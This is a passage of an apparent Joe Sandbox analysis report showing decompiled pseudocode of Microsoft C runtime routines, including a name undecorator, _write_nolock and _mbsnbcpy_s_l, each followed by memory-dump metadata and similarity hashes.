                      				if( *_t106 < 0x36) {
                      					L3:
                      					_t60 =  *0xb30640; // 0x0
                      					if( *_t60 != 0x5f) {
                      						E00963A20(_t77, _t112, _t113,  &_v40, _a12, _a16, _a8, 0);
                      						if(_a16 != 1) {
                      							_v8 = 0;
                      						} else {
                      							_v8 = 1;
                      						}
                      						L00966F40(_t77, _t112, _t113, _a4,  &_v40, _v8);
                      						return _a4;
                      					}
                      					L4:
                      					E0095F1F0( &_v24,  &_v32);
                      					if(E0096A560(_a8) == 0 && (E0096A560(_a12) != 0 || E0096A600(_a12) == 0)) {
                      						E0095FD40( &_v24, _a8);
                      					}
                      					if(E0096A560(_a12) == 0) {
                      						E0095FD40( &_v24, _a12);
                      					}
                      					E00965490(_t77, _t112, _t113, _a4,  &_v24);
                      					return _a4;
                      				}
                      				_t102 =  *0xb30640; // 0x0
                      				if( *_t102 <= 0x39) {
                      					goto L4;
                      				}
                      				goto L3;
                      			}


















                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: EmptyName::is$MailboxNameName::Name::operator+=
                      • String ID:
                      • API String ID: 2270187897-0
                      • Opcode ID: 287f8bb0235469e1764668698faf7789d941823db5fec5243b9b2179ad2ca4ad
                      • Instruction ID: 41a278428aad86f7fdba3d7eea8df9797dbb8d40acbde86572982e2e14bb3a73
                      • Opcode Fuzzy Hash: 287f8bb0235469e1764668698faf7789d941823db5fec5243b9b2179ad2ca4ad
                      • Instruction Fuzzy Hash: 6D415071A04109ABCB08EF95D9A1EEE7379AF94315F108169FD269B291EB30EE04CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00968500(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8) {
                      				signed int _v5;
                      				char _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				char _v36;
                      				char _v44;
                      				char _v52;
                      				char _v96;
                      				char _v140;
                      				char _v184;
                      				intOrPtr _t41;
                      				signed int _t50;
                      				void* _t59;
                      				signed int _t61;
                      				signed int _t71;
                      				intOrPtr _t73;
                      				signed int _t91;
                      				signed int _t94;
                      				signed int _t95;
                      				intOrPtr _t96;
                      				signed int _t98;
                      				signed int _t102;
                      				signed int _t103;
                      
                      				_t106 = __esi;
                      				_t105 = __edi;
                      				_t66 = __ebx;
                      				_t94 =  *0xb30640; // 0x0
                      				if( *_t94 != 0x3f) {
                      					L2:
                      					E0095F350(_a4, 2);
                      					return _a4;
                      				}
                      				_t95 =  *0xb30640; // 0x0
                      				if( *((char*)(_t95 + (1 << 0))) == 0x24) {
                      					_t71 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t71 + 2;
                      					_t96 =  *0xb30634; // 0x0
                      					_v20 = _t96;
                      					_t41 =  *0xb30638; // 0x0
                      					_v24 = _t41;
                      					_t73 =  *0xb3063c; // 0x0
                      					_v28 = _t73;
                      					E0095F5E0( &_v96);
                      					E0095F5E0( &_v140);
                      					E0095F5E0( &_v184);
                      					 *0xb30634 =  &_v96;
                      					 *0xb30638 =  &_v140;
                      					 *0xb3063c =  &_v184;
                      					E0095F3F0( &_v16);
                      					_v5 = 0;
                      					_t98 =  *0xb30640; // 0x0
                      					__eflags =  *_t98 - 0x3f;
                      					if( *_t98 != 0x3f) {
                      						E0095F820( &_v16, E0096A1E0(__ebx, __edi, __esi,  &_v44, 1, 1));
                      					} else {
                      						_t91 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t91 + 1;
                      						E0095F820( &_v16, E00965E80(__ebx, __edi, __esi,  &_v36, 1,  &_v5));
                      					}
                      					_t50 = E0096A560( &_v16);
                      					__eflags = _t50;
                      					if(_t50 != 0) {
                      						 *0xb3064c = 1;
                      					}
                      					__eflags = _v5 & 0x000000ff;
                      					if((_v5 & 0x000000ff) == 0) {
                      						E0095FDE0( &_v16, 0x3c);
                      						E0095FD40( &_v16, E00968210(_t66, _t105, _t106, __eflags,  &_v52));
                      						_t59 = E00965990( &_v16);
                      						__eflags = _t59 - 0x3e;
                      						if(_t59 == 0x3e) {
                      							E0095FDE0( &_v16, 0x20);
                      						}
                      						E0095FDE0( &_v16, 0x3e);
                      						__eflags = _a8 & 0x000000ff;
                      						if((_a8 & 0x000000ff) != 0) {
                      							_t61 =  *0xb30640; // 0x0
                      							__eflags =  *_t61;
                      							if( *_t61 != 0) {
                      								_t102 =  *0xb30640; // 0x0
                      								_t103 = _t102 + 1;
                      								__eflags = _t103;
                      								 *0xb30640 = _t103;
                      							}
                      						}
                      					}
                      					 *0xb30634 = _v20;
                      					 *0xb30638 = _v24;
                      					 *0xb3063c = _v28;
                      					E0095F240(_a4,  &_v16);
                      					return _a4;
                      				}
                      				goto L2;
                      			}




























                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: MailboxName::operator+=$EmptyIterator_baseIterator_base::_NameName::Name::isstd::_
                      • String ID:
                      • API String ID: 3761117093-0
                      • Opcode ID: 2b6af0412a34ad6f608a0090bc7b882192aedf7a8361e6e7c0419994b0db9dc9
                      • Instruction ID: d0b072a6baf0905e63ae933f9717a34420badeae31f62cdf758b1cde218afca3
                      • Opcode Fuzzy Hash: 2b6af0412a34ad6f608a0090bc7b882192aedf7a8361e6e7c0419994b0db9dc9
                      • Instruction Fuzzy Hash: B8519670D102149BDB04EF54ECB2BEE77B5BF94310F2081A9E916572A5EF30AA58CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E009C48F0(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				signed int _v44;
                      				signed int _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				signed int _v60;
                      				signed int _v64;
                      				signed int _v68;
                      				signed int _v72;
                      				signed int _v76;
                      				signed int _v80;
                      				signed int _v84;
                      				signed int _v88;
                      				signed int _v92;
                      				char _v93;
                      				signed int _v100;
                      				char _v104;
                      				char _v108;
                      				signed int _v112;
                      				signed int _v116;
                      				signed int _v120;
                      				signed int _v124;
                      				char _v136;
                      				char _v148;
                      				char _v160;
                      				char _v172;
                      				char _v184;
                      				char _v196;
                      				signed int _t163;
                      				signed int _t169;
                      				signed char _t173;
                      				signed int _t174;
                      				intOrPtr* _t177;
                      				intOrPtr _t185;
                      				signed int _t187;
                      				signed int _t189;
                      				intOrPtr* _t193;
                      				intOrPtr* _t196;
                      				intOrPtr* _t200;
                      				intOrPtr* _t205;
                      				intOrPtr* _t209;
                      				void* _t217;
                      				void* _t221;
                      				void* _t222;
                      				void* _t223;
                      				void* _t285;
                      				void* _t286;
                      				signed int _t290;
                      				void* _t291;
                      				void* _t292;
                      
                      				_t286 = __esi;
                      				_t285 = __edi;
                      				_t222 = __ebx;
                      				_t288 = _t290;
                      				_t291 = _t290 - 0xc0;
                      				_t163 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t163 ^ _t290;
                      				if(_a12 != 0) {
                      					__eflags = _a8;
                      					if(_a8 == 0) {
                      						_v112 = 0;
                      					} else {
                      						_v112 = 1;
                      					}
                      					_v116 = _v112;
                      					__eflags = _v116;
                      					if(__eflags == 0) {
                      						_t221 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x26a, 0, L"%ls", L"buffer != nullptr");
                      						_t291 = _t291 + 0x18;
                      						__eflags = _t221 - 1;
                      						if(_t221 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					__eflags = _v116;
                      					if(_v116 != 0) {
                      						_v93 =  *((intOrPtr*)( *((intOrPtr*)(0xb31198 + (_a4 >> 6) * 4)) + 0x29 + (_a4 & 0x0000003f) * 0x38));
                      						__eflags = _v93 - 2;
                      						if(_v93 == 2) {
                      							L13:
                      							_t169 = _a12;
                      							__eflags = _t169 % 2;
                      							if(_t169 % 2 != 0) {
                      								_v120 = 0;
                      							} else {
                      								_v120 = 1;
                      							}
                      							_v124 = _v120;
                      							__eflags = _v124;
                      							if(__eflags == 0) {
                      								_t217 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x272, 0, L"%ls", L"buffer_size % 2 == 0");
                      								_t291 = _t291 + 0x18;
                      								__eflags = _t217 - 1;
                      								if(_t217 == 1) {
                      									asm("int3");
                      								}
                      							}
                      							__eflags = _v124;
                      							if(_v124 != 0) {
                      								L21:
                      								__eflags =  *( *((intOrPtr*)(0xb31198 + (_a4 >> 6) * 4)) + 0x28 + (_a4 & 0x0000003f) * 0x38) & 0x20;
                      								if(__eflags != 0) {
                      									E009C5510(_a4, 0, 0, 2);
                      									_t291 = _t291 + 0x10;
                      								}
                      								_v100 = _a8;
                      								_v20 = 0;
                      								_v16 = 0;
                      								_v12 = 0;
                      								_t173 = L009C3F00(_t222, _a8, _t286, __eflags, _a4);
                      								_t292 = _t291 + 4;
                      								__eflags = _t173 & 0x000000ff;
                      								if((_t173 & 0x000000ff) == 0) {
                      									_t174 = (_a4 & 0x0000003f) * 0x38;
                      									_t233 =  *((intOrPtr*)(0xb31198 + (_a4 >> 6) * 4));
                      									_t270 =  *(_t233 + _t174 + 0x28) & 0x80;
                      									__eflags =  *(_t233 + _t174 + 0x28) & 0x80;
                      									if(( *(_t233 + _t174 + 0x28) & 0x80) == 0) {
                      										_t177 = E009C3130( &_v196, _a4, _v100, _a12);
                      										_t292 = _t292 + 0x10;
                      										_v92 =  *_t177;
                      										_v88 =  *((intOrPtr*)(_t177 + 4));
                      										_v84 =  *((intOrPtr*)(_t177 + 8));
                      										_t233 = _v92;
                      										_v20 = _v92;
                      										_t270 = _v88;
                      										_v16 = _v88;
                      										_v12 = _v84;
                      									} else {
                      										_v108 = _v93;
                      										__eflags = _v108;
                      										if(_v108 == 0) {
                      											_t193 = L009C3FE0(_t222, _t285, _t286,  &_v160, _a4, _v100, _a12);
                      											_t292 = _t292 + 0x10;
                      											_v56 =  *_t193;
                      											_v52 =  *((intOrPtr*)(_t193 + 4));
                      											_v48 =  *((intOrPtr*)(_t193 + 8));
                      											_v20 = _v56;
                      											_t233 = _v52;
                      											_v16 = _v52;
                      											_t270 = _v48;
                      											_v12 = _v48;
                      										} else {
                      											__eflags = _v108 - 1;
                      											if(_v108 == 1) {
                      												_t196 = E009C43F0(_t222, _t285, _t286,  &_v184, _a4, _v100, _a12);
                      												_t292 = _t292 + 0x10;
                      												_v80 =  *_t196;
                      												_v76 =  *((intOrPtr*)(_t196 + 4));
                      												_v72 =  *((intOrPtr*)(_t196 + 8));
                      												_v20 = _v80;
                      												_t233 = _v76;
                      												_v16 = _v76;
                      												_t270 = _v72;
                      												_v12 = _v72;
                      											} else {
                      												__eflags = _v108 - 2;
                      												if(_v108 == 2) {
                      													_t200 = E009C41E0(_t222, _t285, _t286,  &_v172, _a4, _v100, _a12);
                      													_t292 = _t292 + 0x10;
                      													_v68 =  *_t200;
                      													_v64 =  *((intOrPtr*)(_t200 + 4));
                      													_v60 =  *((intOrPtr*)(_t200 + 8));
                      													_t233 = _v68;
                      													_v20 = _v68;
                      													_t270 = _v64;
                      													_v16 = _v64;
                      													_v12 = _v60;
                      												}
                      											}
                      										}
                      									}
                      								} else {
                      									_t270 = _v93;
                      									_v104 = _v93;
                      									__eflags = _v104;
                      									if(__eflags == 0) {
                      										_t205 = E009C31C0(_t222, _t285, _t286, __eflags,  &_v136, _a4, _v100, _a12);
                      										_t292 = _t292 + 0x10;
                      										_v32 =  *_t205;
                      										_v28 =  *((intOrPtr*)(_t205 + 4));
                      										_v24 =  *((intOrPtr*)(_t205 + 8));
                      										_t233 = _v32;
                      										_v20 = _v32;
                      										_t270 = _v28;
                      										_v16 = _v28;
                      										_v12 = _v24;
                      									} else {
                      										__eflags = _v104;
                      										if(_v104 > 0) {
                      											__eflags = _v104 - 2;
                      											if(_v104 <= 2) {
                      												_t209 = E009C3DF0(_t222, _t285, _t286,  &_v148, _v100, _a12);
                      												_t292 = _t292 + 0xc;
                      												_v44 =  *_t209;
                      												_v40 =  *((intOrPtr*)(_t209 + 4));
                      												_v36 =  *((intOrPtr*)(_t209 + 8));
                      												_t233 = _v44;
                      												_v20 = _v44;
                      												_t270 = _v40;
                      												_v16 = _v40;
                      												_v12 = _v36;
                      											}
                      										}
                      									}
                      								}
                      								__eflags = _v16;
                      								if(_v16 != 0) {
                      									_t181 = _v16 - _v12;
                      									__eflags = _v16 - _v12;
                      								} else {
                      									__eflags = _v20;
                      									if(_v20 == 0) {
                      										_t270 = (_a4 & 0x0000003f) * 0x38;
                      										_t185 =  *((intOrPtr*)(0xb31198 + (_a4 >> 6) * 4));
                      										_t241 =  *(_t185 + _t270 + 0x28) & 0x40;
                      										__eflags =  *(_t185 + _t270 + 0x28) & 0x40;
                      										if(( *(_t185 + _t270 + 0x28) & 0x40) == 0) {
                      											L50:
                      											 *((intOrPtr*)(L00992F70(_t241))) = 0x1c;
                      											_t187 = L00992F40(_t241);
                      											 *_t187 = 0;
                      											_t181 = _t187 | 0xffffffff;
                      											goto L52;
                      										}
                      										_t270 = _v100;
                      										__eflags =  *_v100 - 0x1a;
                      										if( *_v100 != 0x1a) {
                      											goto L50;
                      										}
                      										_t181 = 0;
                      										goto L52;
                      									}
                      									__eflags = _v20 - 5;
                      									if(_v20 != 5) {
                      										_t270 = _v20;
                      										_t189 = L00992F10(_t233, _v20);
                      									} else {
                      										 *((intOrPtr*)(L00992F70(_t233))) = 9;
                      										_t189 = L00992F40(_t233);
                      										 *_t189 = _v20;
                      									}
                      									_t181 = _t189 | 0xffffffff;
                      								}
                      							} else {
                      								 *((intOrPtr*)(L00992F40(2))) = 0;
                      								 *((intOrPtr*)(L00992F70(2))) = 0x16;
                      								_t181 = E00992900(L"buffer_size % 2 == 0", L"_write_nolock", L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x272, 0) | 0xffffffff;
                      							}
                      							goto L52;
                      						}
                      						__eflags = _v93 - 1;
                      						if(_v93 != 1) {
                      							goto L21;
                      						}
                      						goto L13;
                      					} else {
                      						 *((intOrPtr*)(L00992F40(_t223))) = 0;
                      						 *((intOrPtr*)(L00992F70(_t223))) = 0x16;
                      						_t181 = E00992900(L"buffer != nullptr", L"_write_nolock", L"minkernel\\crts\\ucrt\\src\\appcrt\\lowio\\write.cpp", 0x26a, 0) | 0xffffffff;
                      						goto L52;
                      					}
                      				} else {
                      					_t181 = 0;
                      					L52:
                      					return E00957280(_t181, _t222, _v8 ^ _t288, _t270, _t285, _t286);
                      				}
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$_write_nolock$buffer != nullptr$buffer_size % 2 == 0$minkernel\crts\ucrt\src\appcrt\lowio\write.cpp
                      • API String ID: 0-1420694404
                      • Opcode ID: b8045fecf09ea0a1b0c43c667f91cfa4feeb994699cd42e842f1e0d28a381d52
                      • Instruction ID: aab0eef57a1b7befdae3449617299380025ab2ef0b2bc4021c25e723415e2136
                      • Opcode Fuzzy Hash: b8045fecf09ea0a1b0c43c667f91cfa4feeb994699cd42e842f1e0d28a381d52
                      • Instruction Fuzzy Hash: 65E188B4E00208AFDF14DF98C895FAEBBB5AF88304F24855DE519AB392D7749940CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E009AC35F(void* __ecx, signed int _a4, signed int _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20) {
                      				signed int _v8;
                      				signed int _v12;
                      				char _v16;
                      				intOrPtr _v20;
                      				char _v28;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t63;
                      				intOrPtr* _t65;
                      				intOrPtr _t69;
                      				signed int _t70;
                      				intOrPtr* _t73;
                      				void* _t77;
                      				signed char _t82;
                      				signed int _t83;
                      				signed char _t86;
                      				void* _t87;
                      				intOrPtr* _t88;
                      				void* _t90;
                      				signed char _t94;
                      				signed int _t95;
                      				signed int _t96;
                      				signed int _t97;
                      				signed int _t99;
                      				void* _t101;
                      				void* _t102;
                      				void* _t106;
                      				signed int _t109;
                      				char* _t110;
                      				signed int _t111;
                      				signed char* _t112;
                      				intOrPtr _t115;
                      				void* _t116;
                      				signed int _t118;
                      				signed char* _t120;
                      				signed int _t121;
                      				void* _t122;
                      				signed char* _t123;
                      				signed int _t124;
                      				signed char* _t126;
                      				signed int _t127;
                      				char* _t128;
                      				intOrPtr _t131;
                      				signed int _t132;
                      				intOrPtr* _t133;
                      				intOrPtr _t134;
                      				void* _t135;
                      				intOrPtr _t136;
                      				void* _t137;
                      				void* _t138;
                      				void* _t139;
                      
                      				_t116 = __ecx;
                      				_t109 = _a16;
                      				_t63 = 0;
                      				_v12 = 0;
                      				_t127 = _a4;
                      				if(_t109 != 0) {
                      					__eflags = _t127;
                      					if(__eflags == 0) {
                      						L3:
                      						_t110 = L"((_Dst)) != NULL && ((_SizeInBytes)) > 0";
                      						_t128 = L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl";
                      						if(L00994930(_t149, 2, _t128, 0x1e, _t63, L"%ls", _t110) == 1) {
                      							asm("int3");
                      						}
                      						_t65 = L00992F70(_t116);
                      						_t131 = 0x16;
                      						_push(0);
                      						_push(0x1e);
                      						L6:
                      						_push(_t128);
                      						_push(L"_mbsnbcpy_s_l");
                      						_push(_t110);
                      						 *_t65 = _t131;
                      						E00992900();
                      						L7:
                      						return _t131;
                      					}
                      					L10:
                      					_t132 = _a8;
                      					__eflags = _t132;
                      					if(__eflags == 0) {
                      						goto L3;
                      					}
                      					__eflags = _t109;
                      					if(_t109 != 0) {
                      						__eflags = _a12 - _t63;
                      						if(_a12 != _t63) {
                      							L00976CC0(_t109,  &_v28, _t132, _a20);
                      							_t69 = _v20;
                      							__eflags =  *(_t69 + 8);
                      							if( *(_t69 + 8) != 0) {
                      								_t118 = _t132;
                      								_t121 = _t127;
                      								_v8 = _t118;
                      								__eflags = _t109 - 0xffffffff;
                      								if(_t109 != 0xffffffff) {
                      									_t133 = _a12;
                      									while(1) {
                      										_t70 =  *_t133;
                      										 *_t121 = _t70;
                      										_t121 = _t121 + 1;
                      										_t133 = _t133 + 1;
                      										__eflags = _t70;
                      										if(_t70 == 0) {
                      											break;
                      										}
                      										_t118 = _t118 - 1;
                      										__eflags = _t118;
                      										if(_t118 == 0) {
                      											break;
                      										}
                      										_t109 = _t109 - 1;
                      										__eflags = _t109;
                      										if(_t109 != 0) {
                      											continue;
                      										}
                      										break;
                      									}
                      									_a12 = _t133;
                      									_t132 = _a8;
                      									_v8 = _t118;
                      									__eflags = _t109;
                      									if(_t109 == 0) {
                      										 *_t121 = 0;
                      										_t121 = _t121 + 1;
                      										__eflags = _t121;
                      									}
                      									L41:
                      									__eflags = _t118;
                      									if(_t118 != 0) {
                      										__eflags = _t121 - _t127 - 2;
                      										if(_t121 - _t127 < 2) {
                      											L79:
                      											_t111 = _v12;
                      											L80:
                      											__eflags = _t132 - 0xffffffff;
                      											if(_t132 != 0xffffffff) {
                      												__eflags = _t132 - 0x7fffffff;
                      												if(_t132 != 0x7fffffff) {
                      													__eflags = _t132 - _t118 + 1 - _t132;
                      													if(_t132 - _t118 + 1 < _t132) {
                      														_t77 = E009A50C0();
                      														_t118 = _v8;
                      														_t122 = _t118 - 1;
                      														__eflags = _t77 - _t122;
                      														if(_t77 >= _t122) {
                      															_t77 = _t122;
                      														}
                      														__eflags = _t132 + 1 + _t127 - _t118;
                      														E0095AF80(_t127 - _t118, _t132 + 1 + _t127 - _t118, 0xfe, _t77);
                      													}
                      												}
                      											}
                      											__eflags = _t111;
                      											if(_t111 == 0) {
                      												_t131 = 0;
                      												__eflags = 0;
                      												goto L89;
                      											} else {
                      												L87:
                      												_t73 = L00992F70(_t118);
                      												_t131 = 0x2a;
                      												 *_t73 = _t131;
                      												L89:
                      												__eflags = _v16;
                      												if(_v16 != 0) {
                      													 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                      												}
                      												goto L7;
                      											}
                      										}
                      										_t112 = _t121 - 2;
                      										_t123 = _t112;
                      										__eflags = _t112 - _t127;
                      										if(_t112 < _t127) {
                      											L77:
                      											_t82 = _t112 - _t123;
                      											__eflags = _t82 & 0x00000001;
                      											if((_t82 & 0x00000001) == 0) {
                      												goto L79;
                      											}
                      											 *_t112 = 0;
                      											_t118 = _t118 + 1;
                      											_v8 = _t118;
                      											_t111 = 1;
                      											goto L80;
                      										}
                      										_t134 = _v20;
                      										while(1) {
                      											_t83 =  *_t123 & 0x000000ff;
                      											__eflags =  *(_t83 + _t134 + 0x19) & 0x00000004;
                      											if(( *(_t83 + _t134 + 0x19) & 0x00000004) == 0) {
                      												break;
                      											}
                      											_t123 = _t123 - 1;
                      											__eflags = _t123 - _t127;
                      											if(_t123 >= _t127) {
                      												continue;
                      											}
                      											break;
                      										}
                      										_t132 = _a8;
                      										goto L77;
                      									}
                      									__eflags =  *_a12 - _t118;
                      									if( *_a12 == _t118) {
                      										L44:
                      										_t124 = _t121 - 1;
                      										_t118 = _t124;
                      										__eflags = _t124 - _t127;
                      										if(_t124 < _t127) {
                      											L49:
                      											_t86 = _t124 - _t118;
                      											__eflags = _t86 & 0x00000001;
                      											if((_t86 & 0x00000001) == 0) {
                      												L51:
                      												__eflags = _t109 - 0xffffffff;
                      												if(_t109 != 0xffffffff) {
                      													 *_t127 = 0;
                      													__eflags = _t132 - 0xffffffff;
                      													if(__eflags != 0) {
                      														__eflags = _t132 - 0x7fffffff;
                      														if(__eflags != 0) {
                      															__eflags = _t132 - 1;
                      															if(__eflags > 0) {
                      																_t90 = E009A50C0();
                      																_t135 = _t132 - 1;
                      																__eflags = _t90 - _t135;
                      																if(_t90 >= _t135) {
                      																	_t90 = _t135;
                      																}
                      																E0095AF80(_t127, _t127 + 1, 0xfe, _t90);
                      																_t139 = _t139 + 0xc;
                      															}
                      														}
                      													}
                      													_t130 = L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl";
                      													_t87 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl", 0xae, 0, L"%ls", L"(L\"Buffer is too small\" && 0)");
                      													__eflags = _t87 - 1;
                      													if(_t87 == 1) {
                      														asm("int3");
                      													}
                      													_t88 = L00992F70(_t118);
                      													_t131 = 0x22;
                      													 *_t88 = _t131;
                      													E00992900(L"(L\"Buffer is too small\" && 0)", L"_mbsnbcpy_s_l", _t130, 0xae, 0);
                      													goto L89;
                      												}
                      												__eflags = _t132 - 1;
                      												if(_t132 <= 1) {
                      													L60:
                      													 *((char*)(_t127 + _t132 - 1)) = 0;
                      													L61:
                      													_t131 = 0x50;
                      													goto L89;
                      												}
                      												_t126 = _t132 - 2 + _t127;
                      												_t120 = _t126;
                      												__eflags = _t126 - _t127;
                      												if(_t126 < _t127) {
                      													L57:
                      													_t94 = _t126 - _t120;
                      													__eflags = _t94 & 0x00000001;
                      													if((_t94 & 0x00000001) == 0) {
                      														goto L60;
                      													}
                      													 *_t126 = 0;
                      													_t95 = E009A50C0();
                      													__eflags = _t95;
                      													if(_t95 != 0) {
                      														 *((char*)(_t127 + _t132 - 1)) = 0xfe;
                      													}
                      													goto L61;
                      												}
                      												_t115 = _v20;
                      												while(1) {
                      													_t96 =  *_t120 & 0x000000ff;
                      													__eflags =  *(_t96 + _t115 + 0x19) & 0x00000004;
                      													if(( *(_t96 + _t115 + 0x19) & 0x00000004) == 0) {
                      														goto L57;
                      													}
                      													_t120 = _t120 - 1;
                      													__eflags = _t120 - _t127;
                      													if(_t120 >= _t127) {
                      														continue;
                      													}
                      													goto L57;
                      												}
                      												goto L57;
                      											}
                      											 *_t124 = 0;
                      											goto L87;
                      										}
                      										_t136 = _v20;
                      										while(1) {
                      											_t97 =  *_t118 & 0x000000ff;
                      											__eflags =  *(_t97 + _t136 + 0x19) & 0x00000004;
                      											if(( *(_t97 + _t136 + 0x19) & 0x00000004) == 0) {
                      												break;
                      											}
                      											_t118 = _t118 - 1;
                      											__eflags = _t118 - _t127;
                      											if(_t118 >= _t127) {
                      												continue;
                      											}
                      											break;
                      										}
                      										_t132 = _a8;
                      										goto L49;
                      									}
                      									__eflags = _t109 - 1;
                      									if(_t109 != 1) {
                      										goto L51;
                      									}
                      									goto L44;
                      								} else {
                      									goto L32;
                      								}
                      								while(1) {
                      									L32:
                      									_t99 =  *_a12;
                      									 *_t121 = _t99;
                      									_t121 = _t121 + 1;
                      									_a12 = _a12 + 1;
                      									__eflags = _t99;
                      									if(_t99 == 0) {
                      										goto L41;
                      									}
                      									_t118 = _t118 - 1;
                      									__eflags = _t118;
                      									_v8 = _t118;
                      									if(_t118 != 0) {
                      										continue;
                      									}
                      									goto L41;
                      								}
                      								goto L41;
                      							}
                      							_t131 = E009C09A0(_t127, _t132, _a12, _t109);
                      							goto L89;
                      						}
                      						 *_t127 = _t63;
                      						__eflags = _t132 - 0xffffffff;
                      						if(__eflags != 0) {
                      							__eflags = _t132 - 0x7fffffff;
                      							if(__eflags != 0) {
                      								__eflags = _t132 - 1;
                      								if(__eflags > 0) {
                      									_t102 = E009A50C0();
                      									_t137 = _t132 - 1;
                      									__eflags = _t102 - _t137;
                      									if(_t102 >= _t137) {
                      										_t102 = _t137;
                      									}
                      									E0095AF80(_t127, _t127 + 1, 0xfe, _t102);
                      									_t139 = _t139 + 0xc;
                      									_t63 = 0;
                      									__eflags = 0;
                      								}
                      							}
                      						}
                      						_t110 = L"(((_Src))) != NULL";
                      						_t128 = L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl";
                      						_t101 = L00994930(__eflags, 2, _t128, 0x26, _t63, L"%ls", _t110);
                      						__eflags = _t101 - 1;
                      						if(_t101 == 1) {
                      							asm("int3");
                      						}
                      						_t65 = L00992F70(_t116);
                      						_t131 = 0x16;
                      						_push(0);
                      						_push(0x26);
                      						goto L6;
                      					} else {
                      						 *_t127 = _t63;
                      						__eflags = _t132 - 0xffffffff;
                      						if(_t132 != 0xffffffff) {
                      							__eflags = _t132 - 0x7fffffff;
                      							if(_t132 != 0x7fffffff) {
                      								__eflags = _t132 - 1;
                      								if(_t132 > 1) {
                      									_t106 = E009A50C0();
                      									_t138 = _t132 - 1;
                      									__eflags = _t106 - _t138;
                      									if(_t106 >= _t138) {
                      										_t106 = _t138;
                      									}
                      									E0095AF80(_t127, _t127 + 1, 0xfe, _t106);
                      								}
                      							}
                      						}
